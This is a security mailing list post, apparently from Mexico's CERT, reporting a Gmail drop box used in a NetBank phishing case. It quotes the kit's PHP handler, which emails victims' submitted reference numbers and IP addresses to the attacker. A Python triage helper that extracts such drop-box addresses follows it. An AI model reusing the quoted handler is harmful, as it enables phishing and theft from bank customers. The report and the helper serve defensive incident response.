[nsp-sec] Gmail phishing drop-box (NetBank)

David Jiménez ddavinci at gmail.com
Fri Jul 15 15:54:43 EDT 2011


Hi Folks,

The account mail2smith2002 at gmail.com was found in a phishing case against
NetBank (ZA) in Mexico.

Evidence:
////////////////////////////////////////////////////////
<?php
error_reporting(0);

$error = '';

if(isset($_POST['ref'])){

    if(trim($_POST['reference']) == ""){
        $error = '- Please enter a valid Reference Number';
    }
    else if(strlen($_POST['reference']) > 10){
        $error = '- Invalid Reference Number';
    }
    else if(strlen($_POST['reference']) < 5){
        $error = '- Reference Number is Invalid';
    }
         else {
                $to = 'mail2smith2002 at gmail.com';
                $ip = getenv("REMOTE_ADDR");
                $subject = 'Rendurance '.$ip;
                $msg = 'Ref:  '.$_POST['reference'].'
                        <br><br>';
                $msg .= 'IP:'.$ip.'  ';

                $headers  = 'MIME-Version: 1.0' . "\r\n";
                $headers .= 'Content-type: text/html; charset=iso-8859-1' .
"\r\n";
                $headers .= 'From: domain' . "\r\n" .
                    'X-Mailer: PHP/' . phpversion();
                    if(mail($to,$subject,$msg,$headers))
                    {
                        echo '<script type="text/javascript">
                        top.location = "loading.php"
                        </script>';

                    }   else {
                        die("Cannot Send Email");

                }
        }

}

Kind Regards
-- 

---
David Jimenez | CERT-MX Operations Center
--------------------------------------------------------------
Mexican National CSIRT
Federal Police / E-Crime Unit
Email: cert-mx at ssp.gob.mx
Phishing Report: phishing at ssp.gob.mx
PGP Key: 1937 EF11 0521 B628 7228 4699 2BAE 4D94 778B 188
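
Added example (not part of the original report): a triage helper that pulls the drop-box address out of a kit like the one quoted above by resolving the first argument of `mail()`, including the " at " obfuscation that list archives apply. The sample source and its addresses are constructed, and `normalize`, `find_dropboxes` and `posts_user_input` are names chosen for this illustration.

```python
import re

# Constructed sample modelled on the quoted kit; addresses are placeholders.
SAMPLE_KIT = r'''<?php
$to = 'dropbox at example.com';
$ip = getenv("REMOTE_ADDR");
$subject = 'Report '.$ip;
$msg = 'Ref: '.$_POST['reference'];
if(mail($to,$subject,$msg,$headers)) { echo "ok"; }
mail("second@example.org", "x", $msg);
'''

# $var = 'literal';  (only plain string literals, no concatenation)
ASSIGN = re.compile(r'''\$(\w+)\s*=\s*(['"])([^'"]*)\2\s*;''')
# mail( <first argument> ... ), skipping ->mail(, $mail( and names like sendmail(
MAIL_CALL = re.compile(r'''(?<![\w>$])mail\s*\(\s*(\$\w+|(['"])[^'"]*\2)''')
ADDRESS = re.compile(r'[\w.+-]+@[\w-]+(?:\.[\w-]+)+')

def normalize(text):
    """Undo the ' at ' obfuscation that list archives apply to addresses."""
    return re.sub(r'(?<=[\w.+-]) at (?=[\w-]+\.)', '@', text)

def find_dropboxes(php_source):
    """Return sorted addresses that appear as the first argument of mail()."""
    src = normalize(php_source)
    # Map variables that were assigned a plain string literal.
    literals = {m.group(1): m.group(3) for m in ASSIGN.finditer(src)}
    found = set()
    for call in MAIL_CALL.finditer(src):
        arg = call.group(1)
        # Variable argument: look up its literal; quoted argument: strip quotes.
        value = literals.get(arg[1:], '') if arg.startswith('$') else arg[1:-1]
        found.update(a.lower() for a in ADDRESS.findall(value))
    return sorted(found)

def posts_user_input(php_source):
    """True when request data is read, i.e. the script relays form fields."""
    return bool(re.search(r'\$_(POST|GET|REQUEST)\s*\[', php_source))

if __name__ == "__main__":
    print(find_dropboxes(SAMPLE_KIT), posts_user_input(SAMPLE_KIT))
```

Recipients built by concatenation or decoded at run time are not resolved by this static pass and need manual review.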


